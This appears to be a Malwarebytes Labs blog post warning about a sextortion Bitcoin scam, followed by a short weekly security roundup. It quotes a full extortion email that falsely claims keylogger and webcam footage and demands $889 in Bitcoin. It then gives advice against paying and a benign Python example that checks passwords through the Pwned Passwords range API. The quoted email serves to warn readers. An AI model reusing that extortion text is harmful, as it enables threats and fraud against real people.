I am well aware [REDACTED] is your pass words. Lets get right to point. Neither anyone has paid me to investigate you. You may not know me and you are probably thinking why you’re getting this e-mail? 

actually, i installed a software on the adult videos (pornographic material) web-site and do you know what, you visited this website to have fun (you know what i mean). While you were viewing videos, your web browser began working as a Remote Desktop that has a keylogger which gave me accessibility to your display and also cam. Just after that, my software gathered every one of your contacts from your Messenger, Facebook, as well as email . after that i created a double video. 1st part displays the video you were viewing (you’ve got a nice taste haha), and next part shows the recording of your cam, yeah its you. 

You have not one but two choices. Shall we read up on these options in aspects: 

First alternative is to just ignore this message. in such a case, i am going to send out your actual video to every single one of your personal contacts and think regarding the awkwardness you will definitely get. and definitely if you happen to be in a loving relationship, how it would affect? 

Number 2 solution is to pay me $889. Lets name it as a donation. in this situation, i most certainly will asap remove your video footage. You could carry on daily life like this never occurred and you surely will never hear back again from me.

You’ll make the payment through Bi‌tco‌in (if you don’t know this, search for ‘how to buy b‌itcoi‌n’ in Google). 

B‌T‌C‌ ad‌dre‌ss to send to: [REDACTED]

[CaSe sensitive, copy & paste it] 

if you are wondering about going to the law enforcement officials, well, this message can not be traced back to me. I have dealt with my actions. i am also not attempting to demand a huge amount, i would like to be compensated. within this%} emaiQUNdkpeC [SIC] if i do not receive the ‌bi‌tco‌in‌, i will send your video recording to all of your contacts including family members, coworkers, and so forth. Having said that, if i receive the payment, i will erase the recording immediately. If you really want proof, reply Yup then i will send out your video to your 9 friends. This is a non-negotiable offer, so don’t waste mine time and yours by replying to this e mail.

That’s pretty sneaky

It is, and I’d be surprised if there aren’t many others waking up to emails identical to the above. Should you receive one yourself, do the following:

  1. Don’t panic. They absolutely do not have the keys to your computer.
  2. See if the email in question pops up over on Haveibeenpwned.
  3. See if your password does the same thing.
  4. At this point, you may have a fairly good idea which breach they grabbed your old login from, which is always useful information to have.
  5. Delete the email you were sent, and under no circumstances pay them a penny/dime/insert currency of choice here.
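Steps 2 and 3 can be done without ever sending the password anywhere: the Pwned Passwords range API accepts only the first five hex characters of the password's SHA-1 and returns every suffix it knows for that prefix, so the match is made locally. The code below is an added example, not Malwarebytes or Have I Been Pwned code; the offline responder and its count are constructed so the example runs without network access.

```python
import hashlib
import urllib.request

RANGE_API = "https://api.pwnedpasswords.com/range/"


def split_sha1(password):
    """SHA-1 the password and split the upper-case hex digest into a
    5-character prefix (the only part sent) and a 35-character suffix."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range_live(prefix):
    """Fetch the real range response for a prefix (needs network access)."""
    req = urllib.request.Request(RANGE_API + prefix,
                                 headers={"User-Agent": "pwned-range-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed stand-in for an API response so the example runs offline.
# Real responses run to hundreds of lines; the count shown here is made up.
FAKE_RANGE_RESPONSE = {
    "5BAA6": "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471\n"
             "0000000000000000000000000000000000A:2\n",
}


def fetch_range_fake(prefix):
    return FAKE_RANGE_RESPONSE.get(prefix, "")


def parse_range(body):
    """Parse 'SUFFIX:COUNT' lines into {suffix: count}; blank lines are ignored."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password, fetch_range=fetch_range_live):
    """How many times the password appears in the breach corpus (0 if never).
    The full hash never leaves the machine: only the prefix is looked up and
    the suffix is matched against the returned list locally."""
    prefix, suffix = split_sha1(password)
    return parse_range(fetch_range(prefix)).get(suffix, 0)


if __name__ == "__main__":
    # Offline demonstration against the constructed response.
    print("password ->", pwned_count("password", fetch_range_fake))
```

Swap `fetch_range_fake` for the default `fetch_range_live` to query the real service; a non-zero result for the old password in the scam email tells you which habit to break first.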
Scare tactics: an evil practice

The anonymous sender of these mails doesn’t care about the trauma they could cause at the other end. These missives would be particularly traumatic for anyone involved in (say) a revenge porn case previously. And make no mistake, generic Internet blackmail threats can kill.

If you’re able to report these mails for spam/abuse before deleting, do so. There’s a remote chance you could actually save someone’s life while making the Internet a little safer into the bargain.

The post Sextortion Bitcoin scam makes unwelcome return appeared first on Malwarebytes Labs.


A week in security (February 4 – 8)

Malwarebytes - Mon, 02/11/2019 - 17:05

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.
